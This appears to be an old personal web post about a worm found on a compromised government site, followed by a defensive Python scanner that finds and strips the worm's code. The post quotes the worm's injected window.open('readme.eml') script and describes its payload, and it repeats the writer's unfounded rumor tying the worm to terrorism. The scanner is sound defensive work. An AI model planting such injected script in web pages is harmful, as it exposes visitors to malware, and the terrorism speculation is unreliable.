I had to patch my router and add some new filters to stay online.
This one sends 16 messages at a time, as opposed to CODE RED,
which was only exploiting one hole.
I found that most of the machines had only up to 6 vulnerabilities during August infections.
The ones that had up to 6 were able to be shut down by davebrits script.
Yesterday, I found one with 13 vulnerabilities!!!!
Then, when I linked to that machine, it sent a copy of the bug to me via http.
Mozilla popped up and said what to do with this octet-binary.
Then I said, send it to hexedit.
So hexedit opens and I was totally surprised to see: <b>like a dictionary of Windows hacks inside of this thing!!!</b>
plus a JavaScript which it attaches to the bottom of every HTML page on the server.
The JavaScript is basically
<b>window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</b>
6000 from the top of the window, that is....!!!
Internet Explorer (OS X) just tried to display the multipart MIME information in a window it opened at the top of the screen (not at 6000!!!).
Some people still might answer yes to execution on Windows, or save it to disk and then double-click it to open it.
The file was called readme.eml.
When you save it, it naturally saves as readme.exe (or 2983fejy.exe).
Never much of a reason to put a readme into an executable... these days.
Anyway, the site I found was owned by the Japanese government and was an information site for kids and parents about some activity center.
I nabbed their fax number and sent them a message
(Japanese seem to never have a contact e-mail address on the web site;<br>comes from using Windows, I guess).
The site was missing in the morning.
Then the same code may become embedded in every mail message which goes out from the server.
Unpatched versions of Outlook will open it and execute it without any warning.
<blockquote>
So this thing is really easy to get..... especially on the family computer.
</blockquote>
<b>
and then it proceeds to<br>
-- replace a bunch of other files with itself (so it runs often if you use the machine -- if you can actually use one of these machines),<br>
-- give "guest" admin privileges,<br>
-- share all of your drives to the net,<br>
-- mess up your mail and all your webpages
!!!
</b>
So, like Bush is planning, someone is just<br>"smoking Microsoft out of their
holes and they will be destroyed".
The Attorney General denies it, but certainly the persistent rumor in my mind
is that this is related to a terroristic attack on the internet.
<ul>
<li>First discovered 9:00am one week after the attack on the WTC.
<li>Also, this is exactly 3 months from Microsoft's announcement of the discovery of CODE RED I, June 18th, 2001.
</ul>
<i>Mac users stay alert please!!!!!!</i>
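As an added defender-side example (not code from the original post): a scan over a web root for the injected opener quoted above and for dropped readme.eml files, plus a routine that strips the appended script from a page. The sample web root is constructed, and the <html> wrapper around the appended script is an assumption.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample web root (path -> file text); not captured from any real server.
SAMPLE_WEBROOT: Dict[str, str] = {
    "index.html": (
        "<html><body><h1>Activity center</h1></body></html>\n"
        '<html><script language="JavaScript">window.open("readme.eml", null, '
        '"resizable=no,top=6000,left=6000");</script></html>'
    ),
    "about.html": "<html><body><p>About us</p></body></html>",
    "readme.eml": "MIME-Version: 1.0\nContent-Type: multipart/alternative;\n",
    "kids/play.htm": (
        "<html><body>play</body></html>"
        '<html><script>window.open("readme.eml",null,"top=6000,left=6000")</script></html>'
    ),
}

# The opener the post quotes: window.open() aimed at readme.eml. The off-screen
# coordinates may vary between copies, so only the call and its target are matched.
INJECTED_OPENER = re.compile(r'window\.open\(\s*["\']readme\.eml["\']', re.IGNORECASE)

# The whole appended <script> element, with an (assumed) optional <html> wrapper, for removal.
INJECTED_BLOCK = re.compile(
    r'(?:<html>\s*)?<script[^>]*>[^<]*window\.open\(\s*["\']readme\.eml["\'][^<]*</script>(?:\s*</html>)?',
    re.IGNORECASE,
)

PAGE_SUFFIXES = (".html", ".htm", ".asp")


def scan_webroot(files: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (path, finding) pairs: dropped .eml files and pages carrying the appended opener."""
    findings = []
    for path, text in files.items():
        lower = path.lower()
        if lower.endswith(".eml"):
            findings.append((path, "eml-dropper-file"))
        elif lower.endswith(PAGE_SUFFIXES) and INJECTED_OPENER.search(text):
            findings.append((path, "injected-readme-opener"))
    return findings


def strip_injected_script(text: str) -> Tuple[str, int]:
    """Remove every appended opener block from a page; return (cleaned_text, blocks_removed)."""
    cleaned, count = INJECTED_BLOCK.subn("", text)
    return cleaned.rstrip("\n"), count


if __name__ == "__main__":
    for path, finding in scan_webroot(SAMPLE_WEBROOT):
        print(f"{finding:24} {path}")
```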